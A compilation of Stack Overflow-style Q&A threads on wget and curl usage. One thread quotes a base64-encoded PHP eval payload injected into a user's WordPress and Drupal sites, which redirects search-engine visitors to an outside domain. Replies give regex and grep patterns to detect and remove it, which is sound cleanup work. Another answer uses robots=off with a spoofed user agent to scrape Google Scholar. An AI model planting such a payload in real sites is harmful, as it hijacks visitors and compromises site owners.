I'd like to write a simple web spider or just use wget to download pdf results from google scholar. That would actually be quite a spiffy way to get papers for research.
I have read the following pages on stackoverflow:
Crawl website using wget and limit total number of crawled links
How do web spiders differ from Wget's spider?
Downloading all PDF files from a website
How to download all files (but not HTML) from a website using wget?
The last page is probably the most inspirational of all. I did try using wget as suggested on this.
My google scholar search result page is thus but nothing was downloaded.
Given that my level of understanding of webspiders is minimal, what should I do to make this possible? I do realize that writing a spider is perhaps very involved and is a project I may not want to undertake. If it is possible using wget, that would be absolutely awesome.
wget -e robots=off -H --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" -r -l 1 -nd -A pdf http://scholar.google.com/scholar?q=filetype%3Apdf+liquid+films&btnG=&hl=en&as_sdt=0%2C23
A few things to note:
Use of filetyle:pdf in the search query
One level of recursion
-A pdf for only accepting pdfs
-H to span hosts
-e robots=off and use of --user-agent will ensure best results. Google Scholar rejects a blank user agent, and pdf repositories are likely to disallow robots.
The limitation of course is that this will only hit the first page of results. You could expand the depth of recursion, but this will run wild and take forever. I would recommend using a combination of something like Beautiful Soup and wget subprocesses, so that you can parse and traverse the search results strategically.
Related
I need to login to a website which requires credentials. After that I need to click on a link (link url changes everyday but there will be only one link in the page). Once link is clicked file will be downloaded. I achieved this using selenium in windows not sure how to do it in UNIX. After my search in google I understood we can use wget or curl but we need to specify directly the url which I don't know before login.
Here is a "hand wavey" answer.
Use curl or wget to get the first page. It will be a text file.
Use tools like sed and grep to pull out the URL. Then use curl / wget to get the target file. If it is a simple page with one link, this should be rather easy to do.
You can get curl / wget from perzl.
I'm taking the git man page as an example, but I have seen the example I am about to use many places throughout UNIX/Linux.
Under the git man page, it has the following header:
Main Porcelain Commands
Underneath this header, there are a lot of commands with dashes between such as:
git-clone
Since that is headed under Commands you would assume that it means git-clone is a command (I very well know git clone [directory] is a valid.
But it appears that it isn't - so why does the man page list git-clone as being a command? The man pages are good, if you can decode them right.
On my system it says git-clone(1). It is the name of a man page about a command not a command itself.
man git-clone gives:
SYNOPSIS
git clone [--template=<template_directory>]
… showing it with the space instead of the dash.
Before I start the question off, I want to say that a similar question helped me get past the initial login. My issue is as stated below.
There's a website that I'm trying to mirror. It is something that I have an account for. I'm using wget as my tool of choice. I tried curl, but found that while submitting post data is easy with it, wget is better equipped for the task at hand.
The website has an initial login page that it redirects to. After this, you have access to everything on the website. Logins do timeout after so long, but that's it.
With the wget commands below, I was able to successfully save my cookies, load them, and download all child folders. My issue, however, is that each child has an index.html of the same login page. It's like the cookie worked fine for the root folder but nothing beneath it.
The commands I used were:
wget http://site.here.com/users/login --save-cookies cookies.txt --post-data 'email=example#test.com&password=*****&remember_me=1' --keep-session-cookies --delete-after
wget http://site.here.com/ --load-cookies cookies.txt --keep-session-cookies -r -np
Note that the post-data variables/ids are different and that I had to download the login page to see what they were.
Secondly, note that if I didn't put remember_me value to 1 that cookies.txt would be different.
Without remember_me=1
.here.com TRUE / FALSE numbershere CAKEPHP garbagehere
With remember_me=1
site.here.com FALSE / FALSE numbershere CakeCookie[rememberme] garbage
.here.com TRUE / FALSE numbershere CAKEPHP garbagehere
The result being that the former would only download the login page and the latter getting to all child folders, only with children containing index of login and that's it.
I'm kind of stuck and my experience with wget and http is very limited. What would you do to get past this? Generate a cookie for each child? How would you automate that instead of manually creating a cookie file for each child?
P.S: I'm using Linux if that reflects the answers I'm given.
Figured it out. Kind of.
When I wget with options above, I get all children. If I then wget each child(again with options above) and make sure to specify folder by ending with "/", then it works.
Not sure why the behavior is like this, but it is. When I do this, it has no problem grabbing the children's, children or anything as such.
I've been having issues on my server with the following PHP inserted in all of my Drupal and Wordpress sites.
I have downloaded a full backup of my sites and will clean them all before changing my ftp details and reuploading them again. Hopefully this should clear things up.
My question is:
Using Notepad++ is there a *.* style search criteria I could use to scan my backup files and delete the lines of malicious code without having to do them all individually on my local machine?
This would clearly save me loads of time. Up to now, I've been replacing the following code with blank but the eval code varies on each of my sites.
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
I would change your FTP details immediately. You don't want them hosting warez or something if they have been able to work out the password.
Then shutdown your site so that your visitors are not subjected to any scripts or hijacks.
As far as searching goes a regex like this should sort it out:
eval\(base64_decode\("[\d\w]+"\)\);
I've also had the same problem with my WordPress blogs, eval base64_decode hack. The php files were being injected with those eval lines. I suggest you reinstall wordpress/drupal, as some other scripts may already be present in your site, then change all passwords.
Try running grep through ssh, eg. grep -r -H "eval base64_decode". It'll show you which files are infected. Then if you have time, automate the process so you will be notified in case it happens again.
And in the future, always update WordPress/Drupal.
It's easier if you can use special tools to remove this malicious code, because it could be tricky to find the actual regex to match all the code and you never know if that worked, or you broken your site. Especially when you've multiple files, you should identify the suspicious files by the following commands:
grep -R eval.*base64_decode .
grep -R return.*base64_decode .
but it could be not enough, so you should consider using these PHP security scanners.
For more details, check: How to get rid of eval-base64_decode like PHP virus files?.
For Drupal, check also: How to remove malicious scripts from admin pages after being hacked?
I am testing one of my server implementations and was wondering if I could make curl get embedded content? I mean, when a browser loads a page, it downloads all associated content too... Can someone please tell me how to do this with curl?
I don't mind if it dumps even the binary data onto the terminal... I am trying to benchmark my server (keeping it simple initially to test for bugs... probably after this, I will use one of those dedicated tools like ab)...
wget --page-requisites
This option causes Wget to download
all the files that are necessary to
properly display a given HTML page.
if you want to download recursively, use wget with -r option, instead of curl. also check out the wget man page to get certain types of files.